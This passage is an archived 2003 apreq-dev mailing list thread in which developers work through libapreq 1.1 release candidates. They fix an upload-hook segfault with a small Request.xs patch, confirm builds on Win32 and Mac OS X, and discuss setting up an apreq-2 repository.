protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 94010 invoked from network); 5 Jan 2003 20:40:58 -0000 To: Sven Geisler <[email protected]> Cc: [email protected] Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 05 Jan 2003 15:46:54 -0500 In-Reply-To: Sven Geisler's message of "Sun, 5 Jan 2003 21:00:39 +0100" Message-ID: <[email protected]> Lines: 17 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Sven Geisler <[email protected]> writes: [...] > Yes, I use a UPLOAD_HOOK to get information during the upload - like > the transparent_hook example in the doc. I use the same function with > libapreq 1.0 with no problems. It's probably the new PerlIO stuff in 5.8 that's breaking your upload_hook. I just put together rc3 and put it online at http://www.apache.org/~joes/libapreq-1.1_rc3.tar.gz Please give it a try and see if you still get segfaults. -- Joe Schaefer From [email protected] Mon Jan 06 10:22:19 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13751 invoked by uid 500); 6 Jan 2003 10:22:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 13731 invoked from network); 6 Jan 2003 10:22:18 -0000 Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 From: Sven Geisler <[email protected]> To: Joe Schaefer <[email protected]> Cc: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: multipart/mixed; boundary="=-NoPbYS4AtVeWKo7tt0F7" X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) Date: 06 Jan 2003 11:24:11 +0100 Message-Id: <1041848651.14979.72.camel@andes> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --=-NoPbYS4AtVeWKo7tt0F7 Content-Type: text/plain Content-Transfer-Encoding: 7bit Hi Joe, good news: Am Son, 2003-01-05 um 21.46 schrieb Joe Schaefer: > Sven Geisler <[email protected]> writes: > > [...] > > > Yes, I use a UPLOAD_HOOK to get information during the upload - like > > the transparent_hook example in the doc. I use the same function with > > libapreq 1.0 with no problems. > > It's probably the new PerlIO stuff in 5.8 that's breaking your > upload_hook. I just put together rc3 and put it online at > > http://www.apache.org/~joes/libapreq-1.1_rc3.tar.gz > > Please give it a try and see if you still get segfaults. There is no segfault with my second described scenario - segfault with the next request. This is fixed by the new version. The first scenario - segfault with no uploaded file - is still in this version. I add my little patch to Request.xs to prevent this segfault. I attached the diff file for Request.xs. The call apreq->upload returns a list with empty uploads. I use MSIE 5.2 (Mac), Mozilla 1.2 (linux) and MSIE 6.0 (W2K) with the same result. It look to me that the empty parts will be attached to the upload list. Sven. --=-NoPbYS4AtVeWKo7tt0F7 Content-Disposition: attachment; filename=Request.xs.diff Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; name=Request.xs.diff; charset=ISO-8859-15 497a498 > FILE *fp; 500c501,505 < fd =3D PerlLIO_dup(fileno(ApacheUpload_fh(upload))); --- > fp =3D ApacheUpload_fh(upload); > if ( !fp ) > XSRETURN_UNDEF; >=20 > fd =3D PerlLIO_dup(fileno(fp)); --=-NoPbYS4AtVeWKo7tt0F7-- From [email protected] Mon Jan 06 14:49:56 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70389 invoked by uid 500); 6 Jan 2003 14:49:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 70378 invoked from network); 6 Jan 2003 14:49:55 -0000 To: Sven Geisler <[email protected]> Cc: [email protected] Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 References: <[email protected]> <[email protected]> <1041848651.14979.72.camel@andes> From: Joe Schaefer <[email protected]> Date: 06 Jan 2003 09:55:44 -0500 In-Reply-To: Sven Geisler's message of "06 Jan 2003 11:24:11 +0100" Message-ID: <[email protected]> Lines: 20 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Sven Geisler <[email protected]> writes: [...] > The call apreq->upload returns a list with empty uploads. I use MSIE 5.2 > (Mac), Mozilla 1.2 (linux) and MSIE 6.0 (W2K) with the same result. > It look to me that the empty parts will be attached to the upload list. OK, now I see the problem. The upload_hook isn't ever called when the uploaded file is empty (zero bytes), which is what browsers often do when the upload field is left blank. AFAICT, this problem also existed in 1.0. BTW: upload->size should be safe to test in this situation. I'll have rc4 out soon, which will incorporate your patch. Thanks! -- Joe Schaefer From [email protected] Mon Jan 06 15:52:04 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22059 invoked by uid 500); 6 Jan 2003 15:52:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 22047 invoked from network); 6 Jan 2003 15:52:03 -0000 Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 From: Sven Geisler <[email protected]> To: Joe Schaefer <[email protected]> Cc: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <1041848651.14979.72.camel@andes> <[email protected]> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) Date: 06 Jan 2003 16:53:48 +0100 Message-Id: <1041868428.14979.204.camel@andes> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi Joe, sound good. Am Mon, 2003-01-06 um 15.55 schrieb Joe Schaefer: > > BTW: upload->size should be safe to test in this situation. But what is in a case if the user uploads a file with zero bytes. I think this should be handle by the application logic. Kind Regards Sven. From [email protected] Mon Jan 06 16:32:23 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59678 invoked by uid 500); 6 Jan 2003 16:32:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59631 invoked from network); 6 Jan 2003 16:32:22 -0000 To: Sven Geisler <[email protected]> Cc: [email protected] Subject: Re: segfault in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bfh with libapreq 1.1rc2 References: <[email protected]> <[email protected]> <1041848651.14979.72.camel@andes> <[email protected]> <1041868428.14979.204.camel@andes> From: Joe Schaefer <[email protected]> Date: 06 Jan 2003 11:38:15 -0500 In-Reply-To: Sven Geisler's message of "06 Jan 2003 16:53:48 +0100" Message-ID: <[email protected]> Lines: 47 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Sven Geisler <[email protected]> writes: > Am Mon, 2003-01-06 um 15.55 schrieb Joe Schaefer: > > > > BTW: upload->size should be safe to test in this situation. > > But what is in a case if the user uploads a file with zero bytes. > I think this should be handle by the application logic. In libapreq, we don't do anything special to differentiate between 0 byte files and blank upload form widgets. Testing the result of upload->fh in this situation will depend on your use of UPLOAD_HOOK. That's not goodness. Unfortunately, I don't know the Right Answer for this issue, but here are some issues libapreq has to deal with. One potential differentiator would be the contents of upload->filename, but this is *unreliable*. Browsers are not required to supply a file *name* along with the file contents. Also, HTML4-based browsers are allowed to completely ignore the <input type="file"...> form widget when constructing the POST data (assuming the user left it blank). From Section 17.13.2 of the latest HTML spec: If a control doesn't have a current value when the form is submitted, user agents are not required to treat it as a successful control. So basically what I'm saying is this: AFAICT there's no reliable way for libapreq to tell the difference between an empty file and a blank form widget. We should make the behavior of $upload->fh more uniform, but to me, that'd mean running the hook once in for the zero-byte case. This would be a nontrivial change in the behavior of libapreq, so it might be better to schedule this change for the next release. In the next release, we're going to add a "nargs" field to the apache_request_t, which'll break libapreq's ABI. IMO that'd be a good time to incorporate such improvements. -- Joe Schaefer From [email protected] Wed Jan 08 05:01:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17152 invoked by uid 500); 8 Jan 2003 05:01:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 17139 invoked from network); 8 Jan 2003 05:01:08 -0000 To: apreq list <[email protected]> Subject: 1.1_rc4 From: Joe Schaefer <[email protected]> Date: 08 Jan 2003 00:07:15 -0500 Message-ID: <[email protected]> Lines: 15 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N The current cvs is rc4; please test that it's OK: http://www.apache.org/~joes/libapreq-1.1_rc4.tar.gz Assuming Sven Geisler OK's it, I'm +1 for releasing it as 1.1. Thanks for all the help, folks! It's really great that we've now got OS X support, and the Perl API is now segfault free w/ 5.8 (fingers crossed :-). -- Joe Schaefer From [email protected] Wed Jan 08 17:44:32 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75854 invoked by uid 500); 8 Jan 2003 17:44:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 75839 invoked from network); 8 Jan 2003 17:44:32 -0000 Subject: Re: 1.1_rc4 From: Sven Geisler <[email protected]> To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) Date: 08 Jan 2003 18:44:30 +0100 Message-Id: <1042047870.1484.27.camel@andes> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-11 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi Joe, I have no more segfaults after a few request (~ 1600) and multiple tries to reproduce the known segfaults. Do you mean with next version libapreq for mod_perl 2 or do you plan a version 1.2? I guess, I can suggest some ideas for the API after reviewing of my code. Sven. Am Mit, 2003-01-08 um 06.07 schrieb Joe Schaefer: > The current cvs is rc4; please test that > it's OK: > > http://www.apache.org/~joes/libapreq-1.1_rc4.tar.gz > > Assuming Sven Geisler OK's it, I'm +1 > for releasing it as 1.1. > > Thanks for all the help, folks! It's > really great that we've now got OS X > support, and the Perl API is now segfault > free w/ 5.8 (fingers crossed :-). > > -- > Joe Schaefer > From [email protected] Thu Jan 09 05:00:41 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41929 invoked by uid 500); 9 Jan 2003 05:00:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 41918 invoked from network); 9 Jan 2003 05:00:40 -0000 Date: Wed, 8 Jan 2003 22:55:51 -0600 (CST) From: Randy Kobes <[email protected]> To: Joe Schaefer <[email protected]> cc: apreq list <[email protected]> Subject: Re: 1.1_rc4 In-Reply-To: <[email protected]> Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On 8 Jan 2003, Joe Schaefer wrote: > The current cvs is rc4; please test that > it's OK: > > http://www.apache.org/~joes/libapreq-1.1_rc4.tar.gz > > Assuming Sven Geisler OK's it, I'm +1 > for releasing it as 1.1. Builds fine and passes all tests on Win32 ... -- best regards, randy From [email protected] Thu Jan 09 21:59:53 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37042 invoked by uid 500); 9 Jan 2003 21:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 37028 invoked from network); 9 Jan 2003 21:59:51 -0000 Date: Thu, 9 Jan 2003 14:00:03 -0800 Subject: Re: 1.1_rc4 Content-Type: multipart/mixed; boundary=Apple-Mail-59--582105943 Mime-Version: 1.0 (Apple Message framework v551) Cc: apreq list <[email protected]> To: Joe Schaefer <[email protected]> From: David Wheeler <[email protected]> In-Reply-To: <[email protected]> Message-Id: <[email protected]> X-Mailer: Apple Mail (2.551) X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --Apple-Mail-59--582105943 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII; format=flowed On Wednesday, January 8, 2003, at 08:55 PM, Randy Kobes wrote: > On 8 Jan 2003, Joe Schaefer wrote: > >> The current cvs is rc4; please test that >> it's OK: >> >> http://www.apache.org/~joes/libapreq-1.1_rc4.tar.gz >> >> Assuming Sven Geisler OK's it, I'm +1 >> for releasing it as 1.1. > > Builds fine and passes all tests on Win32 ... On Mac OS X 10.2, too. However, since it's now unpacking into libapreq-1.1 instead of httpd-apreq-1.1, I submit the attached patch for INSTALL.MacOSX. Regards, David -- David Wheeler AIM: dwTheory [email protected] ICQ: 15726394 http://david.wheeler.net/ Yahoo!: dew7e Jabber: [email protected] --Apple-Mail-59--582105943 Content-Disposition: attachment; filename=INSTALL.MacOSX.patch Content-Transfer-Encoding: 7bit Content-Type: application/octet-stream; x-unix-mode=0644; name="INSTALL.MacOSX.patch" --- INSTALL.MacOSX.~1.1.~ Thu Jan 2 12:21:19 2003 +++ INSTALL.MacOSX Thu Jan 9 13:54:24 2003 @@ -4,7 +4,7 @@ On Mac OS X 10.2.x Jaguar, the C and Perl libraries must be installed separately. Here's how to do it. -% cd httpd-apreq-1.x +% cd libapreq-1.x % sh BUILD.sh Unpack the libapreq tarball, change into the source code diretory, and then @@ -43,8 +43,8 @@ along side of the apreq-1.x source): % cd apache-1.3.xx -% patch -p0 < ../httpd-apreq-1.x/patches/apache-1.3+apreq.patch -% cp ../httpd-apreq-1.x/c/*.[ch] src/lib/apreq +% patch -p0 < ../libapreq-1.x/patches/apache-1.3+apreq.patch +% cp ../libapreq-1.x/c/*.[ch] src/lib/apreq If you've installed Perl and mod_perl in the default Darwin locations, you'll next need to set the PER5LIB environment variable to "/Library/Perl" so that @@ -69,7 +69,7 @@ Cookie/Makefile.PL, before doing the perl build of libapreq. The following commands should do the trick: -% cd ../httpd-apreq-1.x +% cd ../libapreq-1.x % perl -pi.bak -e 's/-lapreq//' Request/Makefile.PL Cookie/Makefile.PL And finally, the normal Perl build of libapreq should work. Note that you'll --Apple-Mail-59--582105943-- From [email protected] Thu Jan 09 22:17:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59746 invoked by uid 500); 9 Jan 2003 22:17:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59735 invoked from network); 9 Jan 2003 22:17:09 -0000 To: David Wheeler <[email protected]> Cc: apreq list <[email protected]> Subject: Re: 1.1_rc4 References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 09 Jan 2003 17:23:13 -0500 In-Reply-To: David Wheeler's message of "Thu, 9 Jan 2003 14:00:03 -0800" Message-ID: <[email protected]> Lines: 26 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N David Wheeler <[email protected]> writes: > On Wednesday, January 8, 2003, at 08:55 PM, Randy Kobes wrote: [...] > > Builds fine and passes all tests on Win32 ... > > On Mac OS X 10.2, too. Great! Looks like we just need Jim to work his magic now. > However, since it's now unpacking into libapreq-1.1 instead of > httpd-apreq-1.1, I submit the attached patch for INSTALL.MacOSX. Looks like somebody beat you to it on January 5 :-) To get the most up-to-date diff against cvs, type % cvs update % cvs diff The rc4 version of INSTALL.MacOSX should cover the items in your patch. -- Joe Schaefer From [email protected] Thu Jan 09 22:36:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73447 invoked by uid 500); 9 Jan 2003 22:36:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 73436 invoked from network); 9 Jan 2003 22:36:06 -0000 Date: Thu, 9 Jan 2003 14:36:23 -0800 Subject: Re: 1.1_rc4 Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v551) Cc: apreq list <[email protected]> To: Joe Schaefer <[email protected]> From: David Wheeler <[email protected]> In-Reply-To: <[email protected]> Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.551) X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On Thursday, January 9, 2003, at 02:23 PM, Joe Schaefer wrote: >>> Builds fine and passes all tests on Win32 ... >> >> On Mac OS X 10.2, too. > > Great! Looks like we just need Jim to work his magic now. Yeah, it's still not specifically tested on Mac OS X 10.1, but the patch had worked for me there before, and fewer and fewer people will be running 10.1 going forward, anyway. Ken was one of the last holdouts. > Looks like somebody beat you to it on January 5 :-) D'oh! That's what I get for not doing a cvs update, first! Later, David -- David Wheeler AIM: dwTheory [email protected] ICQ: 15726394 http://david.wheeler.net/ Yahoo!: dew7e Jabber: [email protected] From [email protected] Fri Jan 10 06:59:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21643 invoked by uid 500); 10 Jan 2003 06:59:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 21610 invoked from network); 10 Jan 2003 06:59:46 -0000 To: apreq list <[email protected]> Subject: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 10 Jan 2003 02:05:58 -0500 In-Reply-To: Joe Schaefer's message of "09 Jan 2003 17:23:13 -0500" Message-ID: <[email protected]> Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I just tagged cvs as v1_1; as far as I'm concerned 1.1 is fait accompli. I've updated my apache webpage accordingly; the rest is up to Jim. Instead of making another repository on cvs.apache.org, I'm going to create an apreq-2/ directory within our current cvs, and then start dumping stuff into apreq-2/. In the near term, whatever temporary patches we need for httpd-2.0 (and httpd-test) can just go into the existing patches/ directory. Hopefully such patches won't be needed for *too* long. -- Joe Schaefer From [email protected] Sat Jan 11 02:06:49 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16531 invoked by uid 500); 11 Jan 2003 02:06:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16520 invoked from network); 11 Jan 2003 02:06:48 -0000 Message-ID: <[email protected]> Date: Sat, 11 Jan 2003 13:07:21 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: [...] > Instead of making another repository on cvs.apache.org, > I'm going to create an apreq-2/ directory within our current > cvs, and then start dumping stuff into apreq-2/. That's probabably a bad idea, at least for a reason that if you have Makefile.PL in apreq-2 (later) the root dir's Makefile.PL will process the sub-dir's one as well. I don't see any reason why not to create a whole new rep, like all other projects do. Unless you plan to have this one only temporary till the destiny of apreq2 is cleared up. Also would be nice to have the name consistent with httpd-2.0, modperl-2.0... => apreq-2.0. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Sat Jan 11 11:06:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47307 invoked by uid 500); 11 Jan 2003 11:06:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 47296 invoked from network); 11 Jan 2003 11:06:13 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 11 Jan 2003 06:12:29 -0500 In-Reply-To: Stas Bekman's message of "Sat, 11 Jan 2003 13:07:21 +1100" Message-ID: <[email protected]> Lines: 59 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: > Joe Schaefer wrote: > [...] > > Instead of making another repository on cvs.apache.org, > > I'm going to create an apreq-2/ directory within our current > > cvs, and then start dumping stuff into apreq-2/. > > That's probabably a bad idea, at least for a reason that if you have > Makefile.PL in apreq-2 (later) the root dir's Makefile.PL will process > the sub-dir's one as well. Problem noted- thanks for pointing it out. > I don't see any reason why not to create a whole new rep, like all > other projects do. Unless you plan to have this one only temporary > till the destiny of apreq2 is cleared up. That's my plan: to make apreq-2/ (for now) a *temporary* location for apreq-2 development. The directory structure I have in mind looks something like this: apreq-2/ httpd/ (server support for apreq-2) c/ (libapreq-2.X.X ???) perl/ (stuff that should be in mod_perl-2) tcl/ (...) php/ python/ java/ The apreq-2 directory shouldn't have a Makefile.PL to worry about, and I don't plan to put anything into any of the "language" directories right now; just in httpd/. > Also would be nice to have the name consistent with httpd-2.0, > modperl-2.0... => apreq-2.0. We'll certainly do that at the right time. I don't think we're there yet, though. IMO, the level of core support we can rely on for 2.x, needs to be *explicit* before then. Based on dev@'s recent history regarding code contributions, I see no reason to expect them to accomodate us. "Good faith" isn't a word I would attach to their decision regarding Jon Travis' HTML parser. http://marc.theaimsgroup.com/?t=103177775400001&r=1&w=2 Alternatively, I could put cvs repository inside my apache home directory, but I don't know how to make that available through anoncvs. Is that a possibility? -- Joe Schaefer From [email protected] Sun Jan 12 01:48:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24372 invoked by uid 500); 12 Jan 2003 01:48:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 24359 invoked from network); 12 Jan 2003 01:48:05 -0000 Message-ID: <[email protected]> Date: Sun, 12 Jan 2003 12:48:42 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: >>I don't see any reason why not to create a whole new rep, like all >>other projects do. Unless you plan to have this one only temporary >>till the destiny of apreq2 is cleared up. > > > That's my plan: to make apreq-2/ (for now) a *temporary* > location for apreq-2 development. The directory structure I > have in mind looks something like this: > > apreq-2/ > > httpd/ (server support for apreq-2) > > c/ (libapreq-2.X.X ???) > perl/ (stuff that should be in mod_perl-2) It'll be in mod_perl-2.0 *only* if apreq becomes a part of the core, which I'm afraid won't happen. You can't do much if you aren't one of them, so I've tried to "bribe" a few of them but in vain and I think it's the best to forget about this option, move the project on as a standalone one and provide the perl glue internally just like 1.0 did. The building code can be rewritten to find httpd-2.0 and build after httpd-2.0 has been built and optionally installed. It's definitely a bad idea to keep apreq-2.0 as a patch to httpd-2.0 any longer. > tcl/ (...) > php/ > python/ > java/ +1 on the layout. An alternative layout could be: core/ glue/ perl php ... because /c/ is really a core. and putting all languages extensions in one dir will make it easy to 'make all' to build all extensions... just an idea. > The apreq-2 directory shouldn't have a Makefile.PL > to worry about, and I don't plan to put anything > into any of the "language" directories right now; > just in httpd/. But there is a problem with not doing that. If you distribute the package on CPAN you need Makefile.PL to be in the top tree. >>Also would be nice to have the name consistent with httpd-2.0, >>modperl-2.0... => apreq-2.0. > > > We'll certainly do that at the right time. I don't think > we're there yet, though. IMO, the level of core support > we can rely on for 2.x, needs to be *explicit* before then. > > Based on dev@'s recent history regarding code contributions, > I see no reason to expect them to accomodate us. "Good faith" > isn't a word I would attach to their decision regarding > Jon Travis' HTML parser. > > http://marc.theaimsgroup.com/?t=103177775400001&r=1&w=2 > > Alternatively, I could put cvs repository inside my apache > home directory, but I don't know how to make that available > through anoncvs. Is that a possibility? We all agree that waiting for httpd people to give a grace is a complete waste of time. I suggest that we ask Brian Behlendorf to create the apreq-2.0 repository and start working there. It's important for preserving the history of changes. I see no reason why not to do it *now*. Having a repository doesn't mean having a production version of the code. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Sun Jan 12 02:25:25 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45039 invoked by uid 500); 12 Jan 2003 02:25:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 45027 invoked from network); 12 Jan 2003 02:25:24 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: cvs tagged as v1_1 (was Re: 1.1_rc4) References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 11 Jan 2003 21:31:38 -0500 In-Reply-To: Stas Bekman's message of "Sun, 12 Jan 2003 12:48:42 +1100" Message-ID: <[email protected]> Lines: 27 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: [...] > We all agree that waiting for httpd people to give a grace is a complete > waste of time. I suggest that we ask Brian Behlendorf to create the > apreq-2.0 repository and start working there. It's important for > preserving the history of changes. I see no reason why not to do it > *now*. Having a repository doesn't mean having a production version of > the code. Yes, agreed- that would be best. Unfortunately, according to /home/cvs/README, the first step in creating a new cvs repository is: (a) Get permission from your PMC. The PMC must approve the addition of any repository and should be contacted through the normal means. That puts us back at square one, since (I think) our PMC is httpd. I haven't yet lowered my self-esteem enough to now beg them for a new repository to begin our work. If there's a way to make things happen within our existing repository, that'd be a lot less painful for me to 